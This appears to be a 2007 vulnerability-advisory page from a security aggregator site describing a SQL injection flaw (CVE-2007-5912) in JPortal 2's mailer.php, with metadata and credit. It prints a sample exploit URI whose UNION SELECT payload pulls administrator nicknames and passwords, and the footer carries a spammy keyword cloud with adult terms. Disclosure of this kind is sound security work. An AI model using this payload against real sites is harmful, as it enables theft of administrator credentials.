about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , JPortal Mailer.PHP SQL Injection Vulnerability


Title JPortal Mailer.PHP SQL Injection Vulnerability
Published 2007-11-06-12:00AM
Updated 2007-11-19-05:24PM
Class Input Validation Error
CVE   CVE-2007-5912
Remote  Yes
Local  No
Credit  Kacper is credited with the discovery of this vulnerability.
Vulnerable  JPortal JPortal 2
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 08:45:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Windows Xp Crack Data www.boos.a Naked wome andra sex Sex Image aster www.video. sipxtapi sixgirl php-nuke 2 www.jphmob Vidio sex News Searc mamb....in Schmied ha www.91you. news searc Sexactres www.slazyd www.video. phpMy /modules/n 3.5.1. php-nuke 2 prxemo maxcpm.inf sex-89.com 200 /compo 1unionsele seh bbs.hanyua www.song2p Videos de sexwithama Pex girls www.it197. components port 8002 news for C xiari8.101 jill Www.sexy.v WWW.hotsex maxcpm.inf Masala mix moe Brest news for c